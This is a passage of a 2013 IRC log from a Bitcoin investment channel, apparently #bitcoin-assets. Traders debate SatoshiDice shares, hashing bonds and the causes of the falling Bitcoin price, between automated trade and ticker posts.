and that isn't blocked Jul 07 20:17:28 [BTCTC] [ASICMINER-PT] 3 @ 4.06133 = 12.184 BTC [-] Jul 07 20:17:57 so, the whole OMG they blocked the website from US Users was silly from the perspective of someone who understands how s.dice works Jul 07 20:18:14 mjrIII how many users do understand? Jul 07 20:18:15 [BTCTC] [ASICMINER-PT] 1 @ 4.0613 BTC [-] Jul 07 20:18:43 or just send it straight from blockchain Jul 07 20:19:06 my point is that almost everyone uses blockchain Jul 07 20:19:20 [BTCTC] [AMC-PT] 1 @ 0.0018 BTC [+] Jul 07 20:19:21 so you are more likely to be exposed to s.dice via blockchain than by going to their site Jul 07 20:19:29 and no, i hold no equities at the moment Jul 07 20:19:34 [HAVELOCK] [ASICM] 9 @ 0.04198 = 0.3778 BTC [+] Jul 07 20:19:44 [HAVELOCK] [ASICM] 10 @ 0.04198699 = 0.4199 BTC [+] Jul 07 20:19:48 but s.dice's .28 P/E ratio is quite tempting Jul 07 20:19:54 [HAVELOCK] [ASICM] 3 @ 0.042 = 0.126 BTC [+] Jul 07 20:19:56 I hold equity in more than one dice websites. Jul 07 20:20:00 okay, and would that stay forever? is there any known agreement between blockchain and sdice? Jul 07 20:20:05 Most are here to stay. Jul 07 20:21:59 mjrIII and what do you say to the fact that evoorhees intrduces himself as Coinapult CEO, not mentioning SatoshiDice much? Jul 07 20:22:11 even if coinapult is much smaller operation Jul 07 20:22:16 so Jul 07 20:22:21 648.55972400843 that is june's div for s.dice Jul 07 20:22:22 is there something wrong with that/ Jul 07 20:22:27 that is a positive number i believe Jul 07 20:22:45 and that is 13% of their total profit Jul 07 20:22:47 so... Jul 07 20:24:17 ;;calc (648.55972400843 * 100)/13 Jul 07 20:24:18 4988.92095391 Jul 07 20:24:18 mjrIII of course it's good.. but company isn't numbers. company is people Jul 07 20:24:22 Just look at the per share dividend. Does it match 100% profit divided by 100 million shares? Always Jul 07 20:24:29 did justdice make 5k bitcoins last month Jul 07 20:24:47 No Jul 07 20:24:54 ;;ticker Jul 07 20:24:55 MtGox BTCUSD ticker | Best bid: 71.22500, Best ask: 71.24000, Bid-ask spread: 0.01500, Last trade: 71.22501, 24 hour volume: 31145.86411387, 24 hour low: 66.60001, 24 hour high: 71.61334, 24 hour vwap: 69.02590 Jul 07 20:25:04 It made 755.67132996 so far, apparently Jul 07 20:25:14 ;;bcstats Jul 07 20:25:16 ;;nethash Jul 07 20:25:16 Current Blocks: 245330 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 621 blocks | Next Difficulty In About: 3 days, 6 hours, 26 minutes, and 31 seconds | Next Difficulty Estimate: 25440669.41 | Estimated Percent Change: 19.24198 Jul 07 20:25:17 175663.636948 Jul 07 20:26:22 Namworld: do they not match? net profit/total shares doesn't add up? Jul 07 20:26:38 [BTCTC] [DMS.SELLING] 100 @ 0.030989 = 3.0989 BTC [+] Jul 07 20:26:40 [BTCTC] [DMS.SELLING] 40 @ 0.03099 = 1.2396 BTC [+] Jul 07 20:26:41 [BTCTC] [DMS.SELLING] 49 @ 0.031 = 1.519 BTC [+] Jul 07 20:27:14 anyway, for a company that is doing so bad, to have 8X the revenue of your paradigm of the "best" site says that the market doesn't think just-dice is the best Jul 07 20:27:22 and that s.dice is still doing just fine Jul 07 20:27:58 jurov: and what did you mean about the people, i trust erik more than almost everyone in btc Jul 07 20:28:30 i would say the relative "risk-free" people in btc are you, mp, erik, kako Jul 07 20:28:42 maybe namworld and smickles too Jul 07 20:28:51 maybe a few oters Jul 07 20:28:53 ;;seen smickles Jul 07 20:28:53 smickles was last seen in #bitcoin-assets 13 weeks, 3 days, 1 hour, 46 minutes, and 19 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Jul 07 20:28:53 others Jul 07 20:29:16 lol that was a conversation i was having with him lol Jul 07 20:29:53 Chaang-Noi: anyway, profit of 5k bitcoins last month pretty much says everything i need to say about s.dice as a company Jul 07 20:30:06 with no US website, they did 800% of what just-dice did Jul 07 20:30:16 and I think just-dice is great Jul 07 20:30:19 as i said, erik is trustworthy but he seems to consider sdice a liability Jul 07 20:30:22 [HAVELOCK] [HIM] 13 @ 0.31002215 = 4.0303 BTC [-] Jul 07 20:30:29 jurov: he def does i think Jul 07 20:30:38 and is exploring how to protect the company and himself, as he should Jul 07 20:31:25 but at the end of the day, there are few companies in btc space who can claim to have made 5k bitcoins, much less 5k in one month Jul 07 20:31:49 probably count them on both hands i am guessing (ones that are still around at least) Jul 07 20:31:50 pirate did Jul 07 20:31:53 yes Jul 07 20:31:54 =D Jul 07 20:31:55 of course Jul 07 20:32:01 i'm sure glbse must have to Jul 07 20:32:08 and mt gox makes more than that i'd bet Jul 07 20:32:15 mpex i'm sure also has done that Jul 07 20:32:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.041599 = 0.0832 BTC [-] Jul 07 20:32:37 but, think about this just from a fundamentals perspective Jul 07 20:32:54 they had expenses of 167 bitcoin last month Jul 07 20:32:58 to make 5k bitcoin Jul 07 20:33:23 that is the most ridiculous number i've ever seen in my life for a profit margin Jul 07 20:33:40 yes,. let's try fundamentals. did you read mircea's recent accounting stuff implying that since assets are iuner full control of owner/management anyway, they need not to be reported? Jul 07 20:33:49 *under full control Jul 07 20:34:04 what do you mean? Jul 07 20:34:13 is this referring to the private placement? Jul 07 20:34:20 lemme dig it up Jul 07 20:34:28 um...tiberslav is very bearish... Jul 07 20:34:36 and yes, i know about luck Jul 07 20:35:00 this and following comments: http://trilema.com/2013/accounting-for-the-nonzero-asset-corporation-the-mpex-standard/#comment-93803 Jul 07 20:35:06 but it isn't luck when it happens, oh and by the way, that 5k was AFTER taking the loss from last month Jul 07 20:35:14 and s.dice is considered "zero assets company" afaik Jul 07 20:35:30 tubby hates sdice Jul 07 20:35:42 tibby* Jul 07 20:35:56 for me that implies that personal integrity of the owner is more important than in meatspace where everything is reported Jul 07 20:35:58 so they got lucky and made 5k instead of their expected 3k Jul 07 20:36:19 and evoorhees has his problems with it Jul 07 20:36:35 goat, mjr is the buttonwood satoshi square guy• Jul 07 20:37:02 tiberius is a useless know it all Jul 07 20:37:31 mjr is cool is all im saying Jul 07 20:37:34 jurov: yes, there is little recourse in case of fraud Jul 07 20:37:37 ThickAsThieves: lol Jul 07 20:37:39 thanks Jul 07 20:37:53 he does shit n shit Jul 07 20:38:04 jurov: but my point is that erik is trusted, so mgmt counts for a lot Jul 07 20:38:25 yes Jul 07 20:38:27 so when you aggregate trusted mgmt, ridiculous profit margins, low share price, and great market share Jul 07 20:38:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004597 = 0.046 BTC [+] Jul 07 20:38:37 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0047 = 0.0423 BTC [+] Jul 07 20:38:37 you have a strong buy IMO Jul 07 20:38:37 [BTCTC] [TAT.VIRTUALMINE] 299 @ 0.0047 = 1.4053 BTC [+] Jul 07 20:38:43 i'm not advising people to buy Jul 07 20:38:51 but i honestly don't understand why it is valued so low Jul 07 20:39:00 he doesn't stand up to the trust Jul 07 20:39:13 jurov: what do you mean? Jul 07 20:39:16 [BTCTC] [COGNITIVE] 3 @ 0.324776 = 0.9743 BTC [+] Jul 07 20:39:39 i chalk it up to retards like you... Jul 07 20:39:45 [BTCTC] [DMS.SELLING] 1 @ 0.031 BTC [+] Jul 07 20:40:06 mjrIII if he was interested to maintain his trust, he would announce shit in advance Jul 07 20:40:19 not always the case, IMO Jul 07 20:40:29 what did he do that he didn't announce? Jul 07 20:40:44 that s.dice has no own betting pool Jul 07 20:41:10 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0047 = 0.47 BTC [+] Jul 07 20:41:11 goat why are u even starting shit we all know sdice can both not live up to its potential and look like decent investment at the same time Jul 07 20:41:31 it's ok to try and be objective Jul 07 20:41:45 doesnt make someone a troll or idiot Jul 07 20:42:33 Chaang-Noi: i am saying, that if you look at a stock, and see a P/E ratio of .28 or whatever, and then see that they have huge market share, as well as very low expenses to profit ratio, what would you think Jul 07 20:42:35 [HAVELOCK] [SDICE] 2 @ 0.17831404 = 0.3566 BTC [-] Jul 07 20:42:51 i'm not talking about s.dice, i am saying any company Jul 07 20:43:00 P/E is a measure over time Jul 07 20:43:11 [HAVELOCK] [HIM] 1 @ 0.31002215 BTC [-] Jul 07 20:43:20 how long will it take to get the returns to cover the cost i paid for the stock Jul 07 20:43:25 [HAVELOCK] [ASICM] 1 @ 0.0444 BTC [+] Jul 07 20:43:35 mjrIII: i am saying, that if you look at a stock where mgmt suddenly claims it's 6k in debt and it will be paid from next dividend, what would you think Jul 07 20:44:10 difference between in debt, and taking a loss for the month Jul 07 20:44:19 only profits should be distributed, not losses? Jul 07 20:44:26 [BTCTC] [TAT.ASICMINER] 7 @ 0.041599 = 0.2912 BTC [-] Jul 07 20:44:36 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.0047 = 0.0329 BTC [+] Jul 07 20:44:47 [BTCTC] [DMS.PURCHASE] 64 @ 0.048994 = 3.1356 BTC [-] Jul 07 20:45:14 mjrIII no it was not caused by normal dice losses Jul 07 20:45:24 Considering expectation of ~4000 satoshi per month on average, at 0.002 BTC per S.DICE, 50 months. Jul 07 20:45:50 Gambling amounts will probably go back up with BTC price drop however. Jul 07 20:46:13 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Jul 07 20:46:15 [BTCTC] [ASICMINER-PT] 1 @ 4.0613 BTC [-] Jul 07 20:46:17 [BTCTC] [ASICMINER-PT] 2 @ 4.06 = 8.12 BTC [-] Jul 07 20:46:23 mjrIII this, pls read: https://bitcointalk.org/index.php?topic=101902.msg2452138#msg2452138 Jul 07 20:48:38 whatever Jul 07 20:48:42 still don't see the issue Jul 07 20:48:48 he provided interest free loan Jul 07 20:48:53 and now doesn't want to Jul 07 20:49:21 rly? i give up then Jul 07 20:49:37 he could have just listed "operations capital" as an expense of 4k and then showed profit of 1k if he wanted Jul 07 20:49:53 whatever Jul 07 20:50:10 historically, it seems to me that S.DICE has paid out quite a bit in dividends Jul 07 20:50:20 they still have great market share Jul 07 20:50:30 and low expenses Jul 07 20:50:34 that is my only point Jul 07 20:50:42 ic, it's too big to fail Jul 07 20:50:44 do you disagree with any of those points Jul 07 20:50:54 ... Jul 07 20:51:04 i am not looking for investment advice Jul 07 20:51:18 and don't really like playing with equitities in a market filled with retards Jul 07 20:51:27 no, i am asking you a simple question Jul 07 20:51:40 [HAVELOCK] [HIM] 6 @ 0.31002215 = 1.8601 BTC [-] Jul 07 20:51:43 [MPEX] [S.MPOE] 13450 @ 0.00080532 = 10.8316 BTC [-] Jul 07 20:52:00 has s.dice a) paid out a decent sized amount of dividends over their lifetime b) maintain a large market share c) have low expenses for the amount of profit they generate Jul 07 20:52:13 mjrIII, i already told you i agree. and no need to argue with goat Jul 07 20:52:18 Chaang-Noi: and i wasn't directing that at you per se Jul 07 20:52:29 i'm saying that most people in this space have no idea what they are doing Jul 07 20:52:44 yes, including evoor, sadly. Jul 07 20:52:50 [MPEX] [S.MPOE] 2350 @ 0.00080039 = 1.8809 BTC [-] Jul 07 20:53:09 so, i personally don't like assets Jul 07 20:53:12 equities Jul 07 20:53:21 i am looking for more arbitrage stuff Jul 07 20:53:40 i'll defend whatever i please Jul 07 20:54:02 but i never said i didn't like it, i guess my sentiment is that i wish more mature investors saw this equity Jul 07 20:54:12 and valued it appropriately Jul 07 20:54:50 well...that is an interesting question Jul 07 20:54:53 now tell me what does mature investor say about such liabilities disclosed in last minute? Jul 07 20:54:54 monday as always Jul 07 20:55:05 that is the thing\ Jul 07 20:55:06 with such poor wording Jul 07 20:55:13 jurov: i totally agree Jul 07 20:55:27 same issue as when he dumped 3% more on the market Jul 07 20:55:33 and people got all pissed Jul 07 20:55:46 im not saying its ran perfectlhy Jul 07 20:55:49 or even great Jul 07 20:56:14 just saying that the numbers speak for themselves...if you bought their IPO would you be happy or sad right now? Jul 07 20:56:35 yes, enough talk of s.dice Jul 07 20:56:40 as i was saying Jul 07 20:57:03 EVR has been wanting me to move the exchange to EVR Jul 07 20:57:07 and it makes a lot of sense Jul 07 20:57:24 WiFi, electricity, food and drink and private space, and shelter from inclement weather Jul 07 20:57:43 it is the lounge which accepts bitcoin Jul 07 20:57:49 charlie shrem is part owner Jul 07 20:58:08 Chaang-Noi: not everyone lives by CME/CBOE Jul 07 20:58:25 so, i think we will be moving there Jul 07 20:58:30 and then launching another day for the park Jul 07 20:58:40 lol, it is where most options come from Jul 07 20:58:51 and almost all commodities (US at least) Jul 07 20:59:06 chicago mercantile exchange Jul 07 21:00:49 i work in finance, but not a trader Jul 07 21:00:54 and i def don't live in chicago **** BEGIN LOGGING AT Mon Jul 8 05:27:18 2013 Jul 08 05:29:14 you came to the wrong channel mircea_popescu *shakes fists* Jul 08 05:29:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [+] Jul 08 05:30:53 hallo Jul 08 05:30:54 [BTCTC] [TAT.ASICMINER] 7 @ 0.042 = 0.294 BTC [+] Jul 08 05:30:58 wait, wut ?! Jul 08 05:32:14 [HAVELOCK] [ASICM] 280 @ 0.040108 = 11.2302 BTC [-] Jul 08 05:32:16 [HAVELOCK] [ASICM] 100 @ 0.04010706 = 4.0107 BTC [-] Jul 08 05:32:17 [HAVELOCK] [ASICM] 682 @ 0.04010605 = 27.3523 BTC [-] Jul 08 05:32:20 ;;ticker Jul 08 05:32:20 MtGox BTCUSD ticker | Best bid: 77.89500, Best ask: 77.99900, Bid-ask spread: 0.10400, Last trade: 78.00000, 24 hour volume: 42274.79996801, 24 hour low: 66.60001, 24 hour high: 78.68600, 24 hour vwap: 72.50183 Jul 08 05:32:27 heyo Jul 08 05:33:34 [HAVELOCK] [VTX] 1 @ 0.9499978 BTC [+] Jul 08 05:33:35 [HAVELOCK] [VTX] 2 @ 0.9499988 = 1.9 BTC [+] Jul 08 05:33:37 [HAVELOCK] [VTX] 19 @ 0.95 = 18.05 BTC [+] Jul 08 05:33:38 [HAVELOCK] [VTX] 23 @ 0.95 = 21.85 BTC [+] Jul 08 05:34:41 [HAVELOCK] [HIM] 1 @ 0.31002215 BTC [-] Jul 08 05:35:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.0415 = 0.2075 BTC [-] Jul 08 05:35:54 [HAVELOCK] [HIM] 1 @ 0.31002215 BTC [-] Jul 08 05:36:30 [BTCTC] [BTC-BOND] 10 @ 0.009905 = 0.0991 BTC [-] Jul 08 05:37:32 [BTCTC] [S.DICE-PT] 50 @ 0.0022 = 0.11 BTC [-] Jul 08 05:37:59 [BTCTC] [BASIC-MINING] 1 @ 0.18897 BTC [+] Jul 08 05:39:53 [BTCTC] [TAT.ASICMINER] 140 @ 0.042 = 5.88 BTC [+] Jul 08 05:41:53 [BTCTC] [DMS.MINING] 20 @ 0.018399 = 0.368 BTC [+] Jul 08 05:41:55 [BTCTC] [DMS.MINING] 16 @ 0.0184 = 0.2944 BTC [+] Jul 08 05:41:57 [BTCTC] [DMS.MINING] 3 @ 0.018499 = 0.0555 BTC [+] Jul 08 05:42:48 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.004699 = 0.1833 BTC [+] Jul 08 05:42:50 [BTCTC] [TAT.VIRTUALMINE] 76 @ 0.0047 = 0.3572 BTC [+] Jul 08 05:42:51 [BTCTC] [TAT.VIRTUALMINE] 280 @ 0.00477 = 1.3356 BTC [+] Jul 08 05:42:52 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.0049 = 0.1617 BTC [+] Jul 08 05:58:40 [BTCTC] [DMS.PURCHASE] 87 @ 0.048994 = 4.2625 BTC [-] Jul 08 06:02:37 [BTCTC] [TAT.ASICMINER] 31 @ 0.042 = 1.302 BTC [+] Jul 08 06:04:13 [BTCTC] [S.DICE-PT] 100 @ 0.002299 = 0.2299 BTC [+] Jul 08 06:07:02 [BTCTC] [S.DICE-PT] 202 @ 0.0023 = 0.4646 BTC [+] Jul 08 06:07:04 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004455 = 0.4455 BTC [-] Jul 08 06:07:21 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.004454 = 0.8908 BTC [-] Jul 08 06:11:04 [BTCTC] [PAJKA.BOND] 3 @ 0.04975 = 0.1493 BTC [+] Jul 08 06:15:30 ;;ticker Jul 08 06:15:31 MtGox BTCUSD ticker | Best bid: 78.00501, Best ask: 78.49555, Bid-ask spread: 0.49054, Last trade: 78.49555, 24 hour volume: 44182.75657201, 24 hour low: 66.62000, 24 hour high: 78.83000, 24 hour vwap: 72.98185 **** BEGIN LOGGING AT Mon Jul 8 15:23:49 2013 Jul 08 15:23:55 lol Jul 08 15:23:59 D Jul 08 15:24:00 xD Jul 08 15:24:03 He was referring to where a lot of trolling happens Jul 08 15:24:10 o/ mircea_popescu! Jul 08 15:24:11 jurov, i was confused about this https://btct.co/security/TAT.VIRTUALMINE Jul 08 15:24:16 heya Jul 08 15:24:18 yes. and mpoe-pr is explaining it there in all seriousness Jul 08 15:24:28 what we talkin' about ? Jul 08 15:24:32 That's apparently a bond that doens't pay principal? Jul 08 15:24:50 about mpoe. virtualmine has nothing to do with mpoe Jul 08 15:25:39 afaik tat.vm is an attempt by ThickAsThieves to implement the old brendio idea, Jul 08 15:26:03 wherein you could make symmetrical assets which allow you to play the mining futures market Jul 08 15:26:07 deprived has a variant too Jul 08 15:26:27 somehow people have come to believe homebrew is a better solution than the actual solution for some reason. Jul 08 15:28:16 [HAVELOCK] [ASICM] 1 @ 0.042348 BTC [+] Jul 08 15:28:19 [HAVELOCK] [ASICM] 1 @ 0.042349 BTC [+] Jul 08 15:31:41 And this is a bond that does: https://btct.co/security/BTC-BOND Jul 08 15:36:47 does what? Jul 08 15:37:09 that pays the principal back Jul 08 15:38:02 I thought it was standard on bonds Jul 08 15:38:37 Yeah, but there's what people call "hashing bonds" Jul 08 15:38:43 Which pays X mhash/s Jul 08 15:38:57 where getting principal back is not guaranteed. Jul 08 15:39:11 It all depends on mining difficulty. Jul 08 15:39:20 Why not stocks instead? Jul 08 15:39:20 Usually, you never get the principal back. Jul 08 15:39:31 Well, no clue Jul 08 15:39:48 Would stocks be fit for the same purpose? Jul 08 15:40:10 after all, what they pay is more similar to dividends than interest, no? Jul 08 15:40:20 There's plenty of mining stocks. Jul 08 15:40:36 Usually the dividends go up and down according to the mining operation's total hashing. Jul 08 15:40:47 Also it usually comes with rights to the equipment Jul 08 15:41:10 don't they go up and down on hashing bonds as well? Jul 08 15:41:14 While a hashing bond is just that, a fixed X mhash/s payment at fixed intervals Jul 08 15:41:22 No, doesn't go up and down. Jul 08 15:41:33 what is a mhash/s payment? Jul 08 15:41:39 is that processing power? Jul 08 15:41:57 its a synthetic processing power Jul 08 15:42:32 It's a hashing speed. The bond basically pays the expected proceeds of X mhash/s of mining over the payment period. Jul 08 15:43:04 For example Jul 08 15:43:34 Currently 1 mhash/s is estimated to get 0.000165 BTC weekly at current difficulty. Jul 08 15:43:43 This is what it would pay. Jul 08 15:43:57 I really like your bond Namworld Jul 08 15:44:05 If difficulty changes, so does the payment. But it's always fixed at 1 mhash/s Jul 08 15:44:06 daily pay out Jul 08 15:44:18 fixed rate Jul 08 15:44:18 It's not very high interest tho Jul 08 15:44:26 11% a year is fine i think Jul 08 15:44:33 and redeem on demand of course Jul 08 15:44:43 exactly Jul 08 15:44:53 AND you have collateral i believe Jul 08 15:45:01 back in the day i think it was 2X Jul 08 15:45:09 but not sure, its been a while Jul 08 15:45:30 Yes, it was. Jul 08 15:45:34 its also nice though, since you have redeem on demand, you don't really have to, as you can just sell and everyone knows what its worth Jul 08 15:45:50 I have a new theory by the way, on what has been going on with prices Jul 08 15:46:20 which does not lay the blame at the feet of asics Jul 08 15:46:26 Dividend was 0.5% weekly instead too. 26.07% per year. Jul 08 15:46:34 and collateral Jul 08 15:46:58 [BTCTC] [DMS.PURCHASE] 10 @ 0.048994 = 0.4899 BTC [-] Jul 08 15:46:59 can anyone explain to me how people thought asics lowered the price of btc? Jul 08 15:47:09 Those have gone out the window tho. It's 0.03% per day (0.21% per week) Jul 08 15:47:17 now Jul 08 15:47:26 yeah, i had it when it was .03% a day Jul 08 15:47:27 and I think the collateral requirement is gone Jul 08 15:47:30 [BTCTC] [DMS.MINING] 31 @ 0.01925 = 0.5968 BTC [-] Jul 08 15:47:35 because they are stupid. and they like to blame something, usually people who have what they don't have Jul 08 15:47:51 But I have 4x the debt in collateral/funds/stocks/etc Jul 08 15:47:52 i mean, do they attempt to use logic at all? Jul 08 15:48:00 [BTCTC] [DMS.MINING] 4 @ 0.0195 = 0.078 BTC [+] Jul 08 15:48:01 Anyway Jul 08 15:48:13 Namworld: do you hold s.dice? curious\ Jul 08 15:48:29 [BTCTC] [DMS.PURCHASE] 21 @ 0.048994 = 1.0289 BTC [-] Jul 08 15:48:35 I do hold some. But I manage the S.DICE passthrough =/ Jul 08 15:48:55 anyway, my theory is that bitpay, coinbase, and other payment processors are the ones lowering the price Jul 08 15:48:56 thanks Namworld Jul 08 15:48:56 and other MPEx passthrough Jul 08 15:49:00 not in a sinister way Jul 08 15:49:13 they are just sellers who always do market sells Jul 08 15:49:22 [BTCTC] [DMS.MINING] 2 @ 0.0195 = 0.039 BTC [+] Jul 08 15:49:28 [BTCTC] [BTC-BOND] 2 @ 0.009911 = 0.0198 BTC [-] Jul 08 15:49:30 [BTCTC] [BTC-BOND] 102 @ 0.00991 = 1.0108 BTC [-] Jul 08 15:49:31 so the more people start "accepting" bitcoin Jul 08 15:49:32 [BTCTC] [BTC-BOND] 170 @ 0.009905 = 1.6839 BTC [-] Jul 08 15:49:34 [BTCTC] [BTC-BOND] 226 @ 0.009902 = 2.2379 BTC [-] Jul 08 15:49:36 the stronger the downward pressure Jul 08 15:49:53 Hey hey hey... I pay 0.01 each on those bonds Jul 08 15:50:10 Stop market selling =/ Jul 08 15:50:16 yes, I think that bitpay's way of selling all the time is pushing the price down Jul 08 15:50:23 yep Jul 08 15:50:39 they should take their role, as a central flow of bitcoin and use it to stabilize Jul 08 15:50:46 i mean, it would be in their interest to do so Jul 08 15:50:50 they could market mke Jul 08 15:50:54 very easily Jul 08 15:51:00 instead of just dumping Jul 08 15:51:25 that would partially lend itself to a hedging strategy, which would require either futures or options... Jul 08 15:51:27 keep in mind bitcoin has like 8% inflation now - there is no reason to expect the price to rise all the time Jul 08 15:51:33 of course Jul 08 15:51:40 but i think as buyers leave exchanges Jul 08 15:51:56 at least retail (omg, what is this bitcoin stuff, i wanna buy) Jul 08 15:52:08 and the exchanges are dominated by large dumpers Jul 08 15:52:12 of course price drops Jul 08 15:55:40 To whoever is selling BTC-BOND under 0.01... just mail me to redeem Jul 08 15:55:41 which is why large institutions should be using futures Jul 08 15:55:58 Will be processed immediately Jul 08 15:58:01 part of the ASIC kills the price theory goes like this Jul 08 15:58:20 the BTC used to buy ASICs is not coming from new fiat, Jul 08 15:58:20 I know the concept of getting paid when requesting someone's debt to you to be paid might sound... foreign to Bitcoiners. But just request and see. Jul 08 15:58:33 much BTC is spent buying from ASIC company Jul 08 15:58:34 lol Jul 08 15:58:47 ASIC company unloads BTC to buy new ASICs and new tech Jul 08 15:58:50 and to expand Jul 08 15:59:01 people buy stock in ASICMINER, Jul 08 15:59:01 yeah, you could say that they are a dumper as well Jul 08 15:59:21 and now ASICMINER holds a large chunk of stored value Jul 08 15:59:23 but weekly Jul 08 15:59:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.0437 = 0.0874 BTC [+] Jul 08 15:59:28 large AM holders, Jul 08 15:59:29 [BTCTC] [TAT.ASICMINER] 14 @ 0.0439 = 0.6146 BTC [+] Jul 08 15:59:30 [BTCTC] [TAT.ASICMINER] 19 @ 0.0439 = 0.8341 BTC [+] Jul 08 15:59:33 the way i try to look at it, is "is this company a net buyer or a net seller? if so, do they hold coins, or get rid of them immediately" Jul 08 15:59:33 cash out some as a salary Jul 08 15:59:43 i think it all boilds down to Jul 08 15:59:49 less fiat coming in than going out Jul 08 16:00:00 true...you can look it at it that way Jul 08 16:00:02 but for example Jul 08 16:00:11 hence why i always say to everyone that the best thing for bitcoin, on every level, Jul 08 16:00:15 is new blod Jul 08 16:00:17 blood* Jul 08 16:00:18 silk road (pretend they are taking the money) is a net buyer of bitcoins Jul 08 16:00:32 ie. they keep getting more and more bitcoins Jul 08 16:00:37 the joke being that what good is a ponzi without new bagholders? Jul 08 16:00:38 cuz they drive demand Jul 08 16:00:56 TaT, I thought the ASIC kills price theory went like this: 1. ASICs! 2. TONS more hashing! 3. TONS more Bitcoins produced! 4. TONS of price dropdown! 5. I was smart to buy at 250. It's all those mean ASIC companies which dropped the price. Jul 08 16:01:02 coinbase is probably a buyer as well Jul 08 16:01:06 they need coins Jul 08 16:01:21 lol Jul 08 16:01:29 Namworld, that's the idiot's version, yes Jul 08 16:01:30 i always wonder why they think more coins will be produced Jul 08 16:01:47 TBH there is a slightly increased inflationary effect Jul 08 16:01:53 in that it takes slightly less than 10 minutes Jul 08 16:02:06 Because they don't understand Bitcoin. Cause Bitcoin works in misterious ways. Jul 08 16:02:17 Jul 08 16:03:16 but, yes, the money moving off exchanges is a decent theory, Jul 08 16:03:19 but i'm skeptical Jul 08 16:03:43 i think it's that bitcoin is a fiat-dependent economy Jul 08 16:04:09 and if the amount coming in, is less than the amount going out, only speculators can keep the price up Jul 08 16:04:25 true Jul 08 16:04:35 it is fiat dependant now Jul 08 16:04:39 hopefully that is short term Jul 08 16:04:45 but no one uses it as a unit of account Jul 08 16:04:59 it's not short-term Jul 08 16:05:00 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 08 16:05:04 imo Jul 08 16:05:04 well... Jul 08 16:05:07 it depends Jul 08 16:05:17 ThickAsThieves you misrepresent thiongs tho. Jul 08 16:05:19 if you could get a complete business cycle to work in bitcoin Jul 08 16:05:27 the FIAT PRICE of bitcoin is dependent on the flow of fiat. Jul 08 16:05:31 not trivial by any means Jul 08 16:05:33 indeed Jul 08 16:05:41 this has little to do with bitcoin, is just how fiat reflects itself in it. Jul 08 16:06:00 well, my point is that as much as people tout the "acceptance" of bitcoin Jul 08 16:06:08 they are still denominating in US dollars Jul 08 16:06:19 so my purchasing power is dependant on that fiat reflection Jul 08 16:06:20 not only do you need a totalyy btc business cycle, you need layers of it, and it probably boils down to some root fundamental i'm missingh Jul 08 16:06:28 with the exception of mircea_popescu Jul 08 16:06:39 who has fixed his prices in btc terms Jul 08 16:06:52 even mp must bow to fiat Jul 08 16:06:58 not really... Jul 08 16:07:19 he has not changed registration cost except upwards and that was not related to fiat to btc rate Jul 08 16:07:32 oh i meant as an individual Jul 08 16:07:38 ah perhaps true Jul 08 16:07:51 i meant it is cool that someone is being a base Jul 08 16:08:05 Of course. He's depending on BTC -> fiat for food. Jul 08 16:08:11 i mean, if a bar COULD say, one jameson rocks is .05 bitcoin, now and tomorrow and next week Jul 08 16:08:26 and for the foreseable future Jul 08 16:08:32 they would need their vendors to do the same Jul 08 16:08:37 yes Jul 08 16:08:44 and their vendors' vendors Jul 08 16:08:48 hence my point about getting a complete business cycle to operate in btc Jul 08 16:08:52 and the tax man Jul 08 16:08:54 which is not trivial but def possible Jul 08 16:08:59 fuck the tax man lol Jul 08 16:09:08 you know who could do it possibly? Jul 08 16:09:09 maybe that's the root fundamental factor Jul 08 16:09:12 the tax man Jul 08 16:09:20 perhaps Jul 08 16:09:44 the person who could do this best is a farmer i think Jul 08 16:09:55 not a corporate farmer Jul 08 16:10:00 but a small "farmers market" farmer Jul 08 16:10:16 who could possibly buy seeds and fertilizer etc in bitcoin Jul 08 16:10:35 and sell his crop for bitcoin Jul 08 16:10:37 the issue remains though Jul 08 16:10:43 pay taxes? Jul 08 16:10:48 no that and, Jul 08 16:10:55 that btc WILL end up as fiat Jul 08 16:11:04 somewhere in the chain Jul 08 16:11:16 fertilzer's vendor Jul 08 16:11:30 electricty company, etc Jul 08 16:11:38 this is somehow inevitable without a closed loop Jul 08 16:11:43 right Jul 08 16:12:04 you either need layers and layers to float an economay above the leaks Jul 08 16:12:11 or a closed loop Jul 08 16:12:24 The tax man should focus on property taxes for the public infrastructure servicing said properties. And luxury tax on various goods. Goods are already taxed differently based on what purpose they serve. Jul 08 16:12:35 it needs to be more convenient to use your btc as btc than fiat Jul 08 16:12:46 and you need more reason to turn fiat into btc Jul 08 16:13:05 yes Jul 08 16:13:28 maybe there should be a btc-alliance, businesses that refuse to accept fiat Jul 08 16:14:38 look at AM. that's the closest thing we have right now, i'd say.. and i was happy to realize that. buy btc, trade stocks in btc, a whole company born through btc and they even sell btc related products for btc -- but if you substract mining (and financial instruments), there is nothing even close to that Jul 08 16:15:03 gambling Jul 08 16:15:06 is closer Jul 08 16:15:07 + Jul 08 16:15:12 forgot that one Jul 08 16:15:23 gaming could be Jul 08 16:15:35 any service company that pays employees in btc is a start Jul 08 16:16:23 however a refusal to take fiat is also a refusal to convert fiat into btc if you are paying out more btc than fiat as a company Jul 08 16:16:27 hmm Jul 08 16:16:38 we need a btc-based government Jul 08 16:16:58 that's a huge step. i see another beneficial aspect of bitcoin, but yet there aren't enough merchants. i live in europe and a wire transfer to china to purchase goods is very delayed and expensive. bitcoin could do that in ease.. Jul 08 16:16:59 xD Jul 08 16:17:16 a international business network would be nice Jul 08 16:17:36 i know there is bitmit Jul 08 16:17:36 [BTCTC] [DMS.SELLING] 1 @ 0.030309 BTC [+] Jul 08 16:17:37 [BTCTC] [DMS.SELLING] 30 @ 0.030307 = 0.9092 BTC [-] Jul 08 16:17:39 [BTCTC] [DMS.SELLING] 20 @ 0.030305 = 0.6061 BTC [-] Jul 08 16:17:40 [BTCTC] 